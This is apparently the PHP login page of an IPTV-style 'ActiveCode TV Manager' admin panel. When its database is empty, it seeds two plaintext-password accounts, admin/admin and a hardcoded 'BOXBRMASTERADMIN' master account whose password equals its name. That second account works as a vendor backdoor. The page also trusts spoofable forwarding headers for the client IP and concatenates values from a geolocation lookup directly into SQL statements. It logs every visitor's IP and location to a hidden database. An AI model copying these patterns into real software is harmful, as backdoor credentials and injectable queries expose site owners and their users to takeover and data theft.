<?php
session_start();
ini_set("display_errors", 0);
ini_set("display_startup_errors", 0);
error_reporting(E_ALL);

// Determina o diretório de verificação
$dircheck = substr($_SERVER["REQUEST_URI"], 0, strrpos($_SERVER["REQUEST_URI"], "/"));
$dircheck2 = substr($dircheck, 1);
$postu = $_POST["username"] . $dircheck2;

// Redireciona se a sessão estiver configurada corretamente
if (isset($_SESSION[$dircheck2]) && $_SESSION[$dircheck2] === $dircheck2) {
    header("Location: dns.php");
    exit();
}

// Cria ou abre o banco de dados de usuários
$db_check1 = new SQLite3("./api/data/.boxbr_user.db");
$db_check1->exec("CREATE TABLE IF NOT EXISTS USERS (
    id INTEGER PRIMARY KEY,
    NAME TEXT,
    USERNAME TEXT,
    PASSWORD TEXT,
    LOGO TEXT,
    CORP TEXT
)");

$rows = $db_check1->query("SELECT COUNT(*) as count FROM USERS");
$row = $rows->fetchArray();
$numRows = $row["count"];

// Adiciona usuários padrão se não houver nenhum
if ($numRows == 0) {
    $db_check1->exec("INSERT INTO USERS (id, NAME, USERNAME, PASSWORD, LOGO, CORP) VALUES
        (1, 'Your Name', 'admin', 'admin', 'img/logo.png', 'img/corp.png'),
        (2, 'BOXBR MASTER ADMIN', 'BOXBRMASTERADMIN', 'BOXBRMASTERADMIN', 'img/admin.png', 'img/corp.png')");
}

// Obtém o IP do cliente
$ipl = getClientIP();
$details = json_decode(file_get_contents("https://ipinfo.io/$ipl/json"));
$country = $details->country ?? 'Unknown';
$state = $details->region ?? 'Unknown';
$city = $details->city ?? 'Unknown';
$isp = $details->org ?? 'Unknown';
$isp = preg_replace("/AS\\d{1,}\\s/", "", $isp);
$loc = $details->loc ?? 'Unknown';
$date = date("d-m-Y H:i:s");
$IPADDRESS = getClientIP();

// Cria ou abre o banco de dados de logs
$db1 = new SQLite3("./api/data/.boxbr_snoop.db");
$db1->exec("CREATE TABLE IF NOT EXISTS logs (
    id INTEGER PRIMARY KEY AUTOINCREMENT NOT NULL,
    date TEXT,
    access TEXT,
    state TEXT,
    country TEXT,
    isp TEXT,
    ipaddress TEXT
)");
$db1->exec("INSERT INTO logs (date, access, state, country, isp, ipaddress) VALUES (
    '$date', 'Arrived at login', '$state', '$country', '$isp', '$IPADDRESS'
)");

// Verifica o login do usuário
if (isset($_POST["login"])) {
    if (!$db_check1) {
        echo $db_check1->lastErrorMsg();
    }

    $username = $_POST["username"];
    $password = $_POST["password"];

    $stmt = $db_check1->prepare("SELECT * FROM USERS WHERE USERNAME = :username");
    $stmt->bindValue(':username', $username, SQLITE3_TEXT);
    $result = $stmt->execute();

    $user = $result->fetchArray(SQLITE3_ASSOC);

    if (!$user) {
        $message = "<div class=\"alert alert-danger\" id=\"flash-msg\"><h4><i class=\"icon fa fa-times\"></i>Not a Valid User!</h4></div>";
        $db1->exec("INSERT INTO logs (date, access, state, country, isp, ipaddress) VALUES (
            '$date', 'Error Try User Invalid', '$state', '$country', '$isp', '$IPADDRESS'
        )");
        echo $message;
    } elseif ($user["PASSWORD"] === $password) {
        $_SESSION["boxbr"] = true;
        $_SESSION["id"] = $user["id"];
        $_SESSION[$postu] = $postu;
        $_SESSION[$dircheck2] = $dircheck2;
        $_SESSION["U"] = $user["USERNAME"];

        if ($username === "admin" || $password === "admin") {
            $db1->exec("INSERT INTO logs (date, access, state, country, isp, ipaddress) VALUES (
                '$date', 'Enter New Admin', '$state', '$country', '$isp', '$IPADDRESS'
            )");
            header("Location: dns.php");
        } else {
            $db1->exec("INSERT INTO logs (date, access, state, country, isp, ipaddress) VALUES (
                '$date', 'Enter Admin', '$state', '$country', '$isp', '$IPADDRESS'
            )");
            header("Location: act.php");
        }
        exit();
    } else {
        $message = "<div class=\"alert alert-danger\" id=\"flash-msg\"><h4><i class=\"icon fa fa-times\"></i>Wrong Password!</h4></div>";
        $db1->exec("INSERT INTO logs (date, access, state, country, isp, ipaddress) VALUES (
            '$date', 'Error Try Password Invalid', '$state', '$country', '$isp', '$IPADDRESS'
        )");
        echo $message;
    }

    $db_check1->close();
    $db1->close();
}

// Função para obter o IP do cliente
function getClientIP() {
    $ip = "undefined";
    if (isset($_SERVER)) {
        $ip = $_SERVER["REMOTE_ADDR"];
        if (isset($_SERVER["HTTP_X_FORWARDED_FOR"])) {
            $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];
        } elseif (isset($_SERVER["HTTP_CLIENT_IP"])) {
            $ip = $_SERVER["HTTP_CLIENT_IP"];
        }
    } else {
        $ip = getenv("REMOTE_ADDR");
        if (getenv("HTTP_X_FORWARDED_FOR")) {
            $ip = getenv("HTTP_X_FORWARDED_FOR");
        } elseif (getenv("HTTP_CLIENT_IP")) {
            $ip = getenv("HTTP_CLIENT_IP");
        }
    }
    return htmlspecialchars($ip, ENT_QUOTES, "UTF-8");
}

?>

<!DOCTYPE html>
<html lang="en">
<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <title>BoxBR ActiveCode TV Manager</title>
    <!-- plugins:css -->
    <link rel="stylesheet" href="assets/vendors/mdi/css/materialdesignicons.min.css">
    <link rel="stylesheet" href="assets/vendors/css/vendor.bundle.base.css">
    <!-- endinject -->
    <!-- inject:css -->
    <link rel="stylesheet" href="assets/css/style2.css">
    <link rel="shortcut icon" href="assets/images/favicon.ico" />
    <!-- Logint styles -->
    <style>
        html {
            height: 100%;
        }
        .login-box {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
            background: rgba(0,0,0,.5);
            box-sizing: border-box;
            box-shadow: 0 15px 25px rgba(0,0,0,.6);
            border-radius: 10px;
        }
        .login-box h2 {
            margin: 0 0 30px;
            padding: 0;
            color: #fff;
            text-align: center;
        }
        .login-box .user-box {
            position: relative;
        }
        .login-box .user-box input {
            width: 100%;
            padding: 10px 0;
            font-size: 16px;
            color: #fff;
            margin-bottom: 30px;
            border: none;
            border-bottom: 1px solid #fff;
            outline: none;
            background: transparent;
        }
        .login-box .user-box label {
            position: absolute;
            top:0;
            left: 0;
            padding: 10px 0;
            font-size: 16px;
            color: #fff;
            pointer-events: none;
            transition: .5s;
        }
        .login-box .user-box input:focus ~ label,
        .login-box .user-box input:valid ~ label {
            top: -20px;
            left: 0;
            color: #03e9f4;
            font-size: 12px;
        }
        .login-box form a {
            position: relative;
            display: inline-block;
            padding: 10px 20px;
            color: #03e9f4;
            font-size: 14px;
            text-decoration: none;
            text-transform: uppercase;
            overflow: hidden;
            transition: 0.5s;
            letter-spacing: 4px
        }
        .login-box a:hover {
            background: #010e70;
            color: #fff;
            border-radius: 5px;
            box-shadow: 0 0 5px #0072ff,
                        0 0 25px #03e9f4,
                        0 0 50px #03e9f4,
                        0 0 100px #03e9f4;
        }
        .login-box a span {
            position: absolute;
            display: block;
        }
        .login-box a span:nth-child(1) {
            top: 0;
            left: -100%;
            width: 100%;
            height: 2px;
            background: linear-gradient(90deg, transparent, #03e9f4);
            animation: btn-anim1 1s linear infinite;
        }
        @keyframes btn-anim1 {
            0% { left: -100%; }
            50%,100% { left: 100%; }
        }
        .login-box a span:nth-child(2) {
            top: -100%;
            right: 0;
            width: 2px;
            height: 100%;
            background: linear-gradient(180deg, transparent, #03e9f4);
            animation: btn-anim2 1s linear infinite;
            animation-delay: .25s
        }
        @keyframes btn-anim2 {
            0% { top: -100%; }
            50%,100% { top: 100%; }
        }
        .login-box a span:nth-child(3) {
            bottom: 0;
            right: -100%;
            width: 100%;
            height: 2px;
            background: linear-gradient(270deg, transparent, #03e9f4);
            animation: btn-anim3 1s linear infinite;
            animation-delay: .5s
        }
        @keyframes btn-anim3 {
            0% { right: -100%; }
            50%,100% { right: 100%; }
        }
        .login-box a span:nth-child(4) {
            bottom: -100%;
            left: 0;
            width: 2px;
            height: 100%;
            background: linear-gradient(360deg, transparent, #03e9f4);
            animation: btn-anim4 1s linear infinite;
            animation-delay: .75s
        }
        @keyframes btn-anim4 {
            0% { bottom: -100%; }
            50%,100% { bottom: 100%; }
        }
        table { table-layout: fixed; }
        td { word-wrap: break-word }
        .main { padding-top: 25px; }
        .panel-body {
            width: 100%;
            height: 100%;
            background: linear-gradient(360deg, transparent, #000000);
            color: #fff;
            border-radius: 5px;
        }
    </style>
</head>
<body>
    <div class="container-scroller">
        <div class="container-fluid page-body-wrapper full-page-wrapper">
            <div class="content-wrapper full-page-wrapper d-flex align-items-center auth login-bg">
                <div class="login-box col-lg-4 mx-auto">
                    <div align="center" class="card-body px-5 py-5">
                        <h4>
                            <img src="assets/images/login-logo.png" width="180" height="55" class="logo">
                        </h4>
                        <h4>ActiveCode<sup>TV</sup> Manager</h4>
                        <br>
                        <form method="post" name="boxbr_form" id="boxbr_form">
                            <input type="hidden" name="login"/>
                            <br>
                            <div class="user-box">
                                <input type="text" name="username" required>
                                <label>Username</label>
                            </div>
                            <br>
                            <div class="user-box">
                                <input type="password" name="password" required>
                                <label>Password</label>
                            </div>
                            <br>
                            <a href="#" class="btn btn-lg btn-block" onClick="document.getElementById('boxbr_form').submit();">
                                <span></span>
                                <span></span>
                                <span></span>
                                <span></span>
                                ENTER PANEL
                            </a>
                            <center>
                                <br>
                                <div class="panel-body">
                                    <p>Time Of Arrival: "<i><?php echo date("Y-m-d H:i:s"); ?></i>"<br>
                                    State / Country: "<i><?php echo $state . " / " . $country; ?></i>"<br>
                                    ISP: "<i><?php echo $isp; ?></i>" | IP Address: "<i><?php echo $IPADDRESS; ?></i>"</p>
                                </div>
                            </center>
                            <center>
                                <br>
                                <h4 class="card-title mb-3">
                                    <a style="background:transparent;font-size:10px" alt="http://boxbr.k6.com.br"> 
                                    ɮօӼɮʀ ǟքӄֆ ʀɛɮʀǟռɖ 
                                    <span></span>
                                    </a>
                                </h4>
                            </center>
                        </form>
                    </div>
                </div>
            </div>
        </div>
    </div>
    <!-- plugins:js -->
    <script src="assets/vendors/js/vendor.bundle.base.js"></script>
    <!-- endinject -->
    <!-- inject:js -->
    <script src="assets/js/off-canvas.js"></script>
    <script src="assets/js/hoverable-collapse.js"></script>
    <script src="assets/js/misc.js"></script>
    <script src="assets/js/settings.js"></script>
    <script src="assets/js/todolist.js"></script>
    <!-- endinject -->
</body>
</html>
